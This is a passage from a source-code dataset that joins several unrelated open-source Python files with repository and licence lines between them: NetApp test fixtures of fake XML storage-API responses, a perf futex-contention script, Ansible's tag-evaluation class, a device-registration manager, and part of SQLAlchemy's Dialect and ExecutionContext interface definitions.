<relationship-id>ea8bfcc6-5f1d-11e5-8446-123478563412</relationship-id>
<relationship-status>idle</relationship-status>
<relationship-type>data_protection</relationship-type>
<schedule>daily</schedule>
<source-volume>fake_source_volume</source-volume>
<source-vserver>fake_source_vserver</source-vserver>
<vserver>fake_destination_vserver</vserver>
</snapmirror-info>
</attributes-list>
<num-records>1</num-records>
</results>
""")
SNAPMIRROR_GET_ITER_FILTERED_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapmirror-info>
<destination-vserver>fake_destination_vserver</destination-vserver>
<destination-volume>fake_destination_volume</destination-volume>
<is-healthy>true</is-healthy>
<mirror-state>snapmirrored</mirror-state>
<schedule>daily</schedule>
<source-vserver>fake_source_vserver</source-vserver>
<source-volume>fake_source_volume</source-volume>
</snapmirror-info>
</attributes-list>
<num-records>1</num-records>
</results>
""")
SNAPMIRROR_INITIALIZE_RESULT = etree.XML("""
<results status="passed">
<result-status>succeeded</result-status>
</results>
""")
VOLUME_MOVE_GET_ITER_RESULT = etree.XML("""
<results status="passed">
<attributes-list>
<volume-move-info>
<cutover-action>retry_on_failure</cutover-action>
<details>Cutover Completed::Volume move job finishing move</details>
<estimated-completion-time>1481919246</estimated-completion-time>
<percent-complete>82</percent-complete>
<phase>finishing</phase>
<state>healthy</state>
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
</volume-move-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'volume': SHARE_NAME,
'vserver': VSERVER_NAME,
})
PERF_OBJECT_COUNTER_TOTAL_CP_MSECS_LABELS = [
'SETUP', 'PRE_P0', 'P0_SNAP_DEL', 'P1_CLEAN', 'P1_QUOTA', 'IPU_DISK_ADD',
'P2V_INOFILE', 'P2V_INO_PUB', 'P2V_INO_PRI', 'P2V_FSINFO', 'P2V_DLOG1',
'P2V_DLOG2', 'P2V_REFCOUNT', 'P2V_TOPAA', 'P2V_DF_SCORES_SUB', 'P2V_BM',
'P2V_SNAP', 'P2V_DF_SCORES', 'P2V_VOLINFO', 'P2V_CONT', 'P2A_INOFILE',
'P2A_INO', 'P2A_DLOG1', 'P2A_HYA', 'P2A_DLOG2', 'P2A_FSINFO',
'P2A_IPU_BITMAP_GROW', 'P2A_REFCOUNT', 'P2A_TOPAA', 'P2A_HYABC', 'P2A_BM',
'P2A_SNAP', 'P2A_VOLINFO', 'P2_FLUSH', 'P2_FINISH', 'P3_WAIT',
'P3V_VOLINFO', 'P3A_VOLINFO', 'P3_FINISH', 'P4_FINISH', 'P5_FINISH',
]
PERF_OBJECT_COUNTER_LIST_INFO_WAFL_RESPONSE = etree.XML("""
<results status="passed">
<counters>
<counter-info>
<desc>No. of times 8.3 names are accessed per second.</desc>
<name>access_8_3_names</name>
<privilege-level>diag</privilege-level>
<properties>rate</properties>
<unit>per_sec</unit>
</counter-info>
<counter-info>
<desc>Array of counts of different types of CPs</desc>
<labels>
<label-info>wafl_timer generated CP</label-info>
<label-info>snapshot generated CP</label-info>
<label-info>wafl_avail_bufs generated CP</label-info>
<label-info>dirty_blk_cnt generated CP</label-info>
<label-info>full NV-log generated CP,back-to-back CP</label-info>
<label-info>flush generated CP,sync generated CP</label-info>
<label-info>deferred back-to-back CP</label-info>
<label-info>low mbufs generated CP</label-info>
<label-info>low datavecs generated CP</label-info>
<label-info>nvlog replay takeover time limit CP</label-info>
</labels>
<name>cp_count</name>
<privilege-level>diag</privilege-level>
<properties>delta</properties>
<type>array</type>
<unit>none</unit>
</counter-info>
<counter-info>
<base-counter>total_cp_msecs</base-counter>
<desc>Array of percentage time spent in different phases of CP</desc>
<labels>
<label-info>%(labels)s</label-info>
</labels>
<name>cp_phase_times</name>
<privilege-level>diag</privilege-level>
<properties>percent</properties>
<type>array</type>
<unit>percent</unit>
</counter-info>
</counters>
</results>
""" % {'labels': ','.join(PERF_OBJECT_COUNTER_TOTAL_CP_MSECS_LABELS)})
PERF_OBJECT_GET_INSTANCES_SYSTEM_RESPONSE_CMODE = etree.XML("""
<results status="passed">
<instances>
<instance-data>
<counters>
<counter-data>
<name>avg_processor_busy</name>
<value>5674745133134</value>
</counter-data>
</counters>
<name>system</name>
<uuid>%(node1)s:kernel:system</uuid>
</instance-data>
<instance-data>
<counters>
<counter-data>
<name>avg_processor_busy</name>
<value>4077649009234</value>
</counter-data>
</counters>
<name>system</name>
<uuid>%(node2)s:kernel:system</uuid>
</instance-data>
</instances>
<timestamp>1453412013</timestamp>
</results>
""" % {'node1': NODE_NAMES[0], 'node2': NODE_NAMES[1]})
PERF_OBJECT_GET_INSTANCES_SYSTEM_RESPONSE_7MODE = etree.XML("""
<results status="passed">
<timestamp>1454146292</timestamp>
<instances>
<instance-data>
<name>system</name>
<counters>
<counter-data>
<name>avg_processor_busy</name>
<value>13215732322</value>
</counter-data>
</counters>
</instance-data>
</instances>
</results>""")
PERF_OBJECT_INSTANCE_LIST_INFO_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<instance-info>
<name>system</name>
<uuid>%(node)s:kernel:system</uuid>
</instance-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'node': NODE_NAME})
PERF_OBJECT_INSTANCE_LIST_INFO_RESPONSE = etree.XML("""
<results status="passed">
<instances>
<instance-info>
<name>processor0</name>
</instance-info>
<instance-info>
<name>processor1</name>
</instance-info>
</instances>
</results>""")
NET_ROUTES_CREATE_RESPONSE = etree.XML("""
<results status="passed">
<result>
<net-vs-routes-info>
<address-family>ipv4</address-family>
<destination>%(subnet)s</destination>
<gateway>%(gateway)s</gateway>
<metric>20</metric>
<vserver>%(vserver)s</vserver>
</net-vs-routes-info>
</result>
</results>""" % {
'gateway': GATEWAY,
'vserver': VSERVER_NAME,
'subnet': SUBNET,
})
QOS_POLICY_GROUP_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<qos-policy-group-info>
<max-throughput>%(max_througput)s</max-throughput>
<num-workloads>1</num-workloads>
<policy-group>%(qos_policy_group_name)s</policy-group>
<vserver>%(vserver)s</vserver>
</qos-policy-group-info>
</attributes-list>
<num-records>1</num-records>
</results>""" % {
'qos_policy_group_name': QOS_POLICY_GROUP_NAME,
'vserver': VSERVER_NAME,
'max_througput': QOS_MAX_THROUGHPUT,
})
FAKE_VOL_XML = """<volume-info>
<name>open123</name>
<state>online</state>
<size-total>0</size-total>
<size-used>0</size-used>
<size-available>0</size-available>
<is-inconsistent>false</is-inconsistent>
<is-invalid>false</is-invalid>
</volume-info>"""
FAKE_XML1 = """<options>\
<test1>abc</test1>\
<test2>abc</test2>\
</options>"""
FAKE_XML2 = """<root><options>somecontent</options></root>"""
FAKE_NA_ELEMENT = api.NaElement(etree.XML(FAKE_VOL_XML))
FAKE_INVOKE_DATA = 'somecontent'
FAKE_XML_STR = 'abc'
FAKE_API_NAME = 'volume-get-iter'
FAKE_API_NAME_ELEMENT = api.NaElement(FAKE_API_NAME)
FAKE_NA_SERVER_STR = '127.0.0.1'
FAKE_NA_SERVER = api.NaServer(FAKE_NA_SERVER_STR)
FAKE_NA_SERVER_API_1_5 = api.NaServer(FAKE_NA_SERVER_STR)
FAKE_NA_SERVER_API_1_5.set_vfiler('filer')
FAKE_NA_SERVER_API_1_5.set_api_version(1, 5)
FAKE_NA_SERVER_API_1_14 = api.NaServer(FAKE_NA_SERVER_STR)
FAKE_NA_SERVER_API_1_14.set_vserver('server')
FAKE_NA_SERVER_API_1_14.set_api_version(1, 14)
FAKE_NA_SERVER_API_1_20 = api.NaServer(FAKE_NA_SERVER_STR)
FAKE_NA_SERVER_API_1_20.set_vfiler('filer')
FAKE_NA_SERVER_API_1_20.set_vserver('server')
FAKE_NA_SERVER_API_1_20.set_api_version(1, 20)
FAKE_QUERY = {'volume-attributes': None}
FAKE_DES_ATTR = {'volume-attributes': ['volume-id-attributes',
'volume-space-attributes',
'volume-state-attributes',
'volume-qos-attributes']}
FAKE_CALL_ARGS_LIST = [mock.call(80), mock.call(8088), mock.call(443),
mock.call(8488)]
FAKE_RESULT_API_ERR_REASON = api.NaElement('result')
FAKE_RESULT_API_ERR_REASON.add_attr('errno', '000')
FAKE_RESULT_API_ERR_REASON.add_attr('reason', 'fake_reason')
FAKE_RESULT_API_ERRNO_INVALID = api.NaElement('result')
FAKE_RESULT_API_ERRNO_INVALID.add_attr('errno', '000')
FAKE_RESULT_API_ERRNO_VALID = api.NaElement('result')
FAKE_RESULT_API_ERRNO_VALID.add_attr('errno', '14956')
FAKE_RESULT_SUCCESS = api.NaElement('result')
FAKE_RESULT_SUCCESS.add_attr('status', 'passed')
FAKE_HTTP_OPENER = urllib.request.build_opener()
FAKE_MANAGE_VOLUME = {
'aggregate': SHARE_AGGREGATE_NAME,
'name': SHARE_NAME,
'owning-vserver-name': VSERVER_NAME,
'junction_path': VOLUME_JUNCTION_PATH,
'style': 'fake_style',
'size': SHARE_SIZE,
}
FAKE_KEY_MANAGER_ERROR = "The onboard key manager is not enabled. To enable \
it, run \"security key-manager setup\"."
| apache-2.0 |
ashleyjune/SM-G360T1_kernel | tools/perf/scripts/python/futex-contention.py | 11261 | 1486 | # futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
process_names = {}
thread_thislock = {}
thread_blocktime = {}
lock_waits = {} # long-lived stats on (tid,lock) blockage elapsed time
process_names = {} # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, uaddr, op, val, utime, uaddr2, val3):
cmd = op & FUTEX_CMD_MASK
if cmd != FUTEX_WAIT:
return # we don't care about originators of WAKE events
process_names[tid] = comm
thread_thislock[tid] = uaddr
thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm,
nr, ret):
if thread_blocktime.has_key(tid):
elapsed = nsecs(s, ns) - thread_blocktime[tid]
add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
del thread_blocktime[tid]
del thread_thislock[tid]
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
for (tid, lock) in lock_waits:
min, max, avg, count = lock_waits[tid, lock]
print "%s[%d] lock %x contended %d times, %d avg ns" % \
(process_names[tid], tid, lock, count, avg)
| gpl-2.0 |
domibarton/ansible | lib/ansible/playbook/taggable.py | 23 | 3293 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import itertools
from ansible.compat.six import string_types
from ansible.errors import AnsibleError
from ansible.playbook.attribute import FieldAttribute
from ansible.template import Templar
class Taggable:
untagged = frozenset(['untagged'])
_tags = FieldAttribute(isa='list', default=[], listof=(string_types,int))
def __init__(self):
super(Taggable, self).__init__()
def _load_tags(self, attr, ds):
if isinstance(ds, list):
return ds
elif isinstance(ds, basestring):
return [ ds ]
else:
raise AnsibleError('tags must be specified as a list', obj=ds)
def _get_attr_tags(self):
'''
Override for the 'tags' getattr fetcher, used from Base.
'''
tags = self._attributes['tags']
if tags is None:
tags = []
if hasattr(self, '_get_parent_attribute'):
tags = self._get_parent_attribute('tags', extend=True)
return tags
def evaluate_tags(self, only_tags, skip_tags, all_vars):
''' this checks if the current item should be executed depending on tag options '''
should_run = True
if self.tags:
templar = Templar(loader=self._loader, variables=all_vars)
tags = templar.template(self.tags)
if not isinstance(tags, list):
if tags.find(',') != -1:
tags = set(tags.split(','))
else:
tags = set([tags])
else:
tags = set([i for i,_ in itertools.groupby(tags)])
else:
# this makes isdisjoint work for untagged
tags = self.untagged
if only_tags:
should_run = False
if 'always' in tags or 'all' in only_tags:
should_run = True
elif not tags.isdisjoint(only_tags):
should_run = True
elif 'tagged' in only_tags and tags != self.untagged:
should_run = True
if should_run and skip_tags:
# Check for tags that we need to skip
if 'all' in skip_tags:
if 'always' not in tags or 'always' in skip_tags:
should_run = False
elif not tags.isdisjoint(skip_tags):
should_run = False
elif 'tagged' in skip_tags and tags != self.untagged:
should_run = False
return should_run
| gpl-3.0 |
drkitty/arim | arim/udm.py | 2 | 6265 | from hashlib import md5
from string import hexdigits
from time import time
import urllib2
from django.conf import settings
from arim.conrad import Conrad
from arim.constants import (
API_KEY, BASE_URL, CTNR_ENDPOINT, USER_QUERY_KEY, SYSTEM_ENDPOINT,
DESC_ATTR, SYSTEM_QUERY_KEY, DYNINTR_ENDPOINT, USER_ATTR, SYSTEM_NAME,
SYSTEM_DETAIL_ENDPOINT, SYSTEM_ATTR_ENDPOINT, DYNINTR_WORKGROUP,
DYNINTR_RANGE, DYNINTR_CTNR)
from arim.utils import first
class UserDeviceManager(object):
@staticmethod
def process_mac(mac):
return filter(lambda x: x in hexdigits, mac)
def __init__(self, user, api_client=None):
self.username = user
self.api_client = api_client or Conrad(API_KEY, BASE_URL)
def get_all(self):
"""get all of the user's devices"""
# first get the list of systems
query = {USER_QUERY_KEY: self.username}
systems = self.api_client.get(SYSTEM_ENDPOINT, query=query)
while self.api_client.get_next():
systems += self.api_client.result['results']
# now add MAC info
devices = []
for s in systems:
# get description (Hardware type)
desc_eavs = filter(lambda x: x['attribute'] == DESC_ATTR,
s['systemav_set'])
if not desc_eavs:
continue
desc = desc_eavs[0]['value']
# get MAC
# find dynamic interface by system ID
query = {SYSTEM_QUERY_KEY: s['id']}
ds = self.api_client.get(DYNINTR_ENDPOINT, query=query)
if not ds:
continue
d = ds[0]
# pull dynamic intr MAC
mac = d['mac']
if d['range'] == DYNINTR_RANGE:
devices.append({
'id': s['id'],
'description': desc,
'mac': mac,
})
return devices
def get(self, pk):
system = self.api_client.get(SYSTEM_ENDPOINT, pk=pk)
# make sure the interface is the user's
if next(
filter(lambda x: x == USER_ATTR, system['systemav_set'])
)['value'] != self.username:
return False
# get description
desc = next(filter(lambda x: x['attribute'] == DESC_ATTR))['value']
# find interface
query = {SYSTEM_QUERY_KEY: system['id']}
d = self.api_client.get(DYNINTR_ENDPOINT, query)
# get MAC from interface
mac = d['mac']
device = {
'id': system['id'],
'description': desc,
'mac': mac
}
return device
def create(self, description, mac):
# preprocess MAC
mac = self.process_mac(mac)
# generate a unique identifier
m = md5()
m.update(mac + '-' + str(time()))
hash = m.hexdigest()
# create the new system
system_data = {
'name': SYSTEM_NAME.format(hash),
'ctnr': CTNR_ENDPOINT(settings.PUBLIC_CTNR_PK)
}
system_resp = self.api_client.post(SYSTEM_ENDPOINT, system_data)
system_id = system_resp['id']
# The entity field in the core/system/attributes endpoint is a
# HyperlinkedRelatedField, so we have to send it the URL corresponding
# to the system, instead of just a primary key.
system_url = SYSTEM_DETAIL_ENDPOINT(system_id)
try:
# create other ID attribute
other_id_data = {
"entity": system_url,
"attribute": USER_ATTR,
"value": self.username
}
self.api_client.post(SYSTEM_ATTR_ENDPOINT, other_id_data)
# create hardware type attribute
hardware_type_data = {
"entity": system_url,
"attribute": DESC_ATTR,
"value": description
}
self.api_client.post(SYSTEM_ATTR_ENDPOINT, hardware_type_data)
# create dynamic intr
interface_data = {
"mac": mac,
"range": DYNINTR_RANGE,
"system": system_url,
"workgroup": DYNINTR_WORKGROUP,
}
self.api_client.post(DYNINTR_ENDPOINT, interface_data)
except urllib2.HTTPError:
self.delete(system_id)
raise
def update(self, pk, description, mac):
# preprocess mac
mac = self.process_mac(mac)
# get the system
system_data = self.api_client.get(SYSTEM_ENDPOINT, pk=pk)
# make sure the interface is the user's
owner = next(iter(
filter(lambda x: x['attribute'] == USER_ATTR,
system_data['systemav_set'])
))['value']
if owner != self.username:
return False
# get description url
# id is a HyperlinkedIdentityField so we don't need to process it
hardware_type_url = next(iter(
filter(lambda x: x['attribute'] == DESC_ATTR,
system_data['systemav_set'])
))['id']
# update hardware type (description)
hardware_type_data = {"value": description}
self.api_client.patch(hardware_type_url, pk=None,
data=hardware_type_data, verbatim=True)
# find the dynamic interface
interface_query = {SYSTEM_QUERY_KEY: system_data['id']}
interface_data = self.api_client.get(DYNINTR_ENDPOINT,
query=interface_query)[0]
interface_update_data = {"mac": mac}
self.api_client.patch(DYNINTR_ENDPOINT, pk=interface_data['id'],
data=interface_update_data)
def delete(self, pk):
# get the system
system = self.api_client.get(SYSTEM_ENDPOINT, pk=pk)
# make sure the interface is the user's
if next(
iter(filter(lambda x: x['attribute'] == USER_ATTR,
system['systemav_set']))
)['value'] != self.username:
return False
# delete the system (the attrs and interface are deleted automatically)
self.api_client.delete(SYSTEM_ENDPOINT, pk=pk)
| bsd-3-clause |
Drvanon/Game | venv/lib/python3.3/site-packages/sqlalchemy/engine/interfaces.py | 11 | 29197 | # engine/interfaces.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Define core interfaces used by the engine system."""
from .. import util, event, events
class Dialect(object):
"""Define the behavior of a specific database and DB-API combination.
Any aspect of metadata definition, SQL query generation,
execution, result-set handling, or anything else which varies
between databases is defined under the general category of the
Dialect. The Dialect acts as a factory for other
database-specific object implementations including
ExecutionContext, Compiled, DefaultGenerator, and TypeEngine.
All Dialects implement the following attributes:
name
identifying name for the dialect from a DBAPI-neutral point of view
(i.e. 'sqlite')
driver
identifying name for the dialect's DBAPI
positional
True if the paramstyle for this Dialect is positional.
paramstyle
the paramstyle to be used (some DB-APIs support multiple
paramstyles).
convert_unicode
True if Unicode conversion should be applied to all ``str``
types.
encoding
type of encoding to use for unicode, usually defaults to
'utf-8'.
statement_compiler
a :class:`.Compiled` class used to compile SQL statements
ddl_compiler
a :class:`.Compiled` class used to compile DDL statements
server_version_info
a tuple containing a version number for the DB backend in use.
This value is only available for supporting dialects, and is
typically populated during the initial connection to the database.
default_schema_name
the name of the default schema. This value is only available for
supporting dialects, and is typically populated during the
initial connection to the database.
execution_ctx_cls
a :class:`.ExecutionContext` class used to handle statement execution
execute_sequence_format
either the 'tuple' or 'list' type, depending on what cursor.execute()
accepts for the second argument (they vary).
preparer
a :class:`~sqlalchemy.sql.compiler.IdentifierPreparer` class used to
quote identifiers.
supports_alter
``True`` if the database supports ``ALTER TABLE``.
max_identifier_length
The maximum length of identifier names.
supports_unicode_statements
Indicate whether the DB-API can receive SQL statements as Python
unicode strings
supports_unicode_binds
Indicate whether the DB-API can receive string bind parameters
as Python unicode strings
supports_sane_rowcount
Indicate whether the dialect properly implements rowcount for
``UPDATE`` and ``DELETE`` statements.
supports_sane_multi_rowcount
Indicate whether the dialect properly implements rowcount for
``UPDATE`` and ``DELETE`` statements when executed via
executemany.
preexecute_autoincrement_sequences
True if 'implicit' primary key functions must be executed separately
in order to get their value. This is currently oriented towards
Postgresql.
implicit_returning
use RETURNING or equivalent during INSERT execution in order to load
newly generated primary keys and other column defaults in one execution,
which are then available via inserted_primary_key.
If an insert statement has returning() specified explicitly,
the "implicit" functionality is not used and inserted_primary_key
will not be available.
dbapi_type_map
A mapping of DB-API type objects present in this Dialect's
DB-API implementation mapped to TypeEngine implementations used
by the dialect.
This is used to apply types to result sets based on the DB-API
types present in cursor.description; it only takes effect for
result sets against textual statements where no explicit
typemap was present.
colspecs
A dictionary of TypeEngine classes from sqlalchemy.types mapped
to subclasses that are specific to the dialect class. This
dictionary is class-level only and is not accessed from the
dialect instance itself.
supports_default_values
Indicates if the construct ``INSERT INTO tablename DEFAULT
VALUES`` is supported
supports_sequences
Indicates if the dialect supports CREATE SEQUENCE or similar.
sequences_optional
If True, indicates if the "optional" flag on the Sequence() construct
should signal to not generate a CREATE SEQUENCE. Applies only to
dialects that support sequences. Currently used only to allow Postgresql
SERIAL to be used on a column that specifies Sequence() for usage on
other backends.
supports_native_enum
Indicates if the dialect supports a native ENUM construct.
This will prevent types.Enum from generating a CHECK
constraint when that type is used.
supports_native_boolean
Indicates if the dialect supports a native boolean construct.
This will prevent types.Boolean from generating a CHECK
constraint when that type is used.
"""
def create_connect_args(self, url):
"""Build DB-API compatible connection arguments.
Given a :class:`~sqlalchemy.engine.url.URL` object, returns a tuple
consisting of a `*args`/`**kwargs` suitable to send directly
to the dbapi's connect function.
"""
raise NotImplementedError()
@classmethod
def type_descriptor(cls, typeobj):
"""Transform a generic type to a dialect-specific type.
Dialect classes will usually use the
:func:`.types.adapt_type` function in the types module to
accomplish this.
The returned result is cached *per dialect class* so can
contain no dialect-instance state.
"""
raise NotImplementedError()
def initialize(self, connection):
"""Called during strategized creation of the dialect with a
connection.
Allows dialects to configure options based on server version info or
other properties.
The connection passed here is a SQLAlchemy Connection object,
with full capabilities.
The initalize() method of the base dialect should be called via
super().
"""
pass
def reflecttable(self, connection, table, include_columns=None):
"""Load table description from the database.
Given a :class:`.Connection` and a
:class:`~sqlalchemy.schema.Table` object, reflect its columns and
properties from the database. If include_columns (a list or
set) is specified, limit the autoload to the given column
names.
The default implementation uses the
:class:`~sqlalchemy.engine.reflection.Inspector` interface to
provide the output, building upon the granular table/column/
constraint etc. methods of :class:`.Dialect`.
"""
raise NotImplementedError()
def get_columns(self, connection, table_name, schema=None, **kw):
"""Return information about columns in `table_name`.
Given a :class:`.Connection`, a string
`table_name`, and an optional string `schema`, return column
information as a list of dictionaries with these keys:
name
the column's name
type
[sqlalchemy.types#TypeEngine]
nullable
boolean
default
the column's default value
autoincrement
boolean
sequence
a dictionary of the form
{'name' : str, 'start' :int, 'increment': int}
Additional column attributes may be present.
"""
raise NotImplementedError()
def get_primary_keys(self, connection, table_name, schema=None, **kw):
"""Return information about primary keys in `table_name`.
Deprecated. This method is only called by the default
implementation of :meth:`.Dialect.get_pk_constraint`. Dialects should
instead implement this method directly.
"""
raise NotImplementedError()
def get_pk_constraint(self, connection, table_name, schema=None, **kw):
"""Return information about the primary key constraint on
table_name`.
Given a :class:`.Connection`, a string
`table_name`, and an optional string `schema`, return primary
key information as a dictionary with these keys:
constrained_columns
a list of column names that make up the primary key
name
optional name of the primary key constraint.
"""
raise NotImplementedError()
def get_foreign_keys(self, connection, table_name, schema=None, **kw):
"""Return information about foreign_keys in `table_name`.
Given a :class:`.Connection`, a string
`table_name`, and an optional string `schema`, return foreign
key information as a list of dicts with these keys:
name
the constraint's name
constrained_columns
a list of column names that make up the foreign key
referred_schema
the name of the referred schema
referred_table
the name of the referred table
referred_columns
a list of column names in the referred table that correspond to
constrained_columns
"""
raise NotImplementedError()
def get_table_names(self, connection, schema=None, **kw):
"""Return a list of table names for `schema`."""
raise NotImplementedError
def get_view_names(self, connection, schema=None, **kw):
"""Return a list of all view names available in the database.
schema:
Optional, retrieve names from a non-default schema.
"""
raise NotImplementedError()
def get_view_definition(self, connection, view_name, schema=None, **kw):
"""Return view definition.
Given a :class:`.Connection`, a string
`view_name`, and an optional string `schema`, return the view
definition.
"""
raise NotImplementedError()
def get_indexes(self, connection, table_name, schema=None, **kw):
"""Return information about indexes in `table_name`.
Given a :class:`.Connection`, a string
`table_name` and an optional string `schema`, return index
information as a list of dictionaries with these keys:
name
the index's name
column_names
list of column names in order
unique
boolean
"""
raise NotImplementedError()
def normalize_name(self, name):
"""convert the given name to lowercase if it is detected as
case insensitive.
this method is only used if the dialect defines
requires_name_normalize=True.
"""
raise NotImplementedError()
def denormalize_name(self, name):
"""convert the given name to a case insensitive identifier
for the backend if it is an all-lowercase name.
this method is only used if the dialect defines
requires_name_normalize=True.
"""
raise NotImplementedError()
def has_table(self, connection, table_name, schema=None):
"""Check the existence of a particular table in the database.
Given a :class:`.Connection` object and a string
`table_name`, return True if the given table (possibly within
the specified `schema`) exists in the database, False
otherwise.
"""
raise NotImplementedError()
def has_sequence(self, connection, sequence_name, schema=None):
"""Check the existence of a particular sequence in the database.
Given a :class:`.Connection` object and a string
`sequence_name`, return True if the given sequence exists in
the database, False otherwise.
"""
raise NotImplementedError()
def _get_server_version_info(self, connection):
"""Retrieve the server version info from the given connection.
This is used by the default implementation to populate the
"server_version_info" attribute and is called exactly
once upon first connect.
"""
raise NotImplementedError()
def _get_default_schema_name(self, connection):
"""Return the string name of the currently selected schema from
the given connection.
This is used by the default implementation to populate the
"default_schema_name" attribute and is called exactly
once upon first connect.
"""
raise NotImplementedError()
def do_begin(self, dbapi_connection):
"""Provide an implementation of ``connection.begin()``, given a
DB-API connection.
The DBAPI has no dedicated "begin" method and it is expected
that transactions are implicit. This hook is provided for those
DBAPIs that might need additional help in this area.
Note that :meth:`.Dialect.do_begin` is not called unless a
:class:`.Transaction` object is in use. The
:meth:`.Dialect.do_autocommit`
hook is provided for DBAPIs that need some extra commands emitted
after a commit in order to enter the next transaction, when the
SQLAlchemy :class:`.Connection` is used in it's default "autocommit"
mode.
:param dbapi_connection: a DBAPI connection, typically
proxied within a :class:`.ConnectionFairy`.
"""
raise NotImplementedError()
def do_rollback(self, dbapi_connection):
"""Provide an implementation of ``connection.rollback()``, given
a DB-API connection.
:param dbapi_connection: a DBAPI connection, typically
proxied within a :class:`.ConnectionFairy`.
"""
raise NotImplementedError()
def do_commit(self, dbapi_connection):
"""Provide an implementation of ``connection.commit()``, given a
DB-API connection.
:param dbapi_connection: a DBAPI connection, typically
proxied within a :class:`.ConnectionFairy`.
"""
raise NotImplementedError()
def do_close(self, dbapi_connection):
"""Provide an implementation of ``connection.close()``, given a DBAPI
connection.
This hook is called by the :class:`.Pool` when a connection has been
detached from the pool, or is being returned beyond the normal
capacity of the pool.
.. versionadded:: 0.8
"""
raise NotImplementedError()
def create_xid(self):
"""Create a two-phase transaction ID.
This id will be passed to do_begin_twophase(),
do_rollback_twophase(), do_commit_twophase(). Its format is
unspecified.
"""
raise NotImplementedError()
def do_savepoint(self, connection, name):
"""Create a savepoint with the given name.
:param connection: a :class:`.Connection`.
:param name: savepoint name.
"""
raise NotImplementedError()
def do_rollback_to_savepoint(self, connection, name):
"""Rollback a connection to the named savepoint.
:param connection: a :class:`.Connection`.
:param name: savepoint name.
"""
raise NotImplementedError()
def do_release_savepoint(self, connection, name):
"""Release the named savepoint on a connection.
:param connection: a :class:`.Connection`.
:param name: savepoint name.
"""
raise NotImplementedError()
def do_begin_twophase(self, connection, xid):
"""Begin a two phase transaction on the given connection.
:param connection: a :class:`.Connection`.
:param xid: xid
"""
raise NotImplementedError()
def do_prepare_twophase(self, connection, xid):
"""Prepare a two phase transaction on the given connection.
:param connection: a :class:`.Connection`.
:param xid: xid
"""
raise NotImplementedError()
def do_rollback_twophase(self, connection, xid, is_prepared=True,
recover=False):
"""Rollback a two phase transaction on the given connection.
:param connection: a :class:`.Connection`.
:param xid: xid
:param is_prepared: whether or not
:meth:`.TwoPhaseTransaction.prepare` was called.
:param recover: if the recover flag was passed.
"""
raise NotImplementedError()
def do_commit_twophase(self, connection, xid, is_prepared=True,
recover=False):
"""Commit a two phase transaction on the given connection.
:param connection: a :class:`.Connection`.
:param xid: xid
:param is_prepared: whether or not
:meth:`.TwoPhaseTransaction.prepare` was called.
:param recover: if the recover flag was passed.
"""
raise NotImplementedError()
def do_recover_twophase(self, connection):
"""Recover list of uncommited prepared two phase transaction
identifiers on the given connection.
:param connection: a :class:`.Connection`.
"""
raise NotImplementedError()
def do_executemany(self, cursor, statement, parameters, context=None):
"""Provide an implementation of ``cursor.executemany(statement,
parameters)``."""
raise NotImplementedError()
def do_execute(self, cursor, statement, parameters, context=None):
"""Provide an implementation of ``cursor.execute(statement,
parameters)``."""
raise NotImplementedError()
def do_execute_no_params(self, cursor, statement, parameters,
context=None):
"""Provide an implementation of ``cursor.execute(statement)``.
The parameter collection should not be sent.
"""
raise NotImplementedError()
def is_disconnect(self, e, connection, cursor):
"""Return True if the given DB-API error indicates an invalid
connection"""
raise NotImplementedError()
def connect(self):
"""return a callable which sets up a newly created DBAPI connection.
The callable accepts a single argument "conn" which is the
DBAPI connection itself. It has no return value.
This is used to set dialect-wide per-connection options such as
isolation modes, unicode modes, etc.
If a callable is returned, it will be assembled into a pool listener
that receives the direct DBAPI connection, with all wrappers removed.
If None is returned, no listener will be generated.
"""
return None
def reset_isolation_level(self, dbapi_conn):
"""Given a DBAPI connection, revert its isolation to the default."""
raise NotImplementedError()
def set_isolation_level(self, dbapi_conn, level):
"""Given a DBAPI connection, set its isolation level."""
raise NotImplementedError()
def get_isolation_level(self, dbapi_conn):
"""Given a DBAPI connection, return its isolation level."""
raise NotImplementedError()
class ExecutionContext(object):
"""A messenger object for a Dialect that corresponds to a single
execution.
ExecutionContext should have these data members:
connection
Connection object which can be freely used by default value
generators to execute SQL. This Connection should reference the
same underlying connection/transactional resources of
root_connection.
root_connection
Connection object which is the source of this ExecutionContext. This
Connection may have close_with_result=True set, in which case it can
only be used once.
dialect
dialect which created this ExecutionContext.
cursor
DB-API cursor procured from the connection,
compiled
if passed to constructor, sqlalchemy.engine.base.Compiled object
being executed,
statement
string version of the statement to be executed. Is either
passed to the constructor, or must be created from the
sql.Compiled object by the time pre_exec() has completed.
parameters
bind parameters passed to the execute() method. For compiled
statements, this is a dictionary or list of dictionaries. For
textual statements, it should be in a format suitable for the
dialect's paramstyle (i.e. dict or list of dicts for non
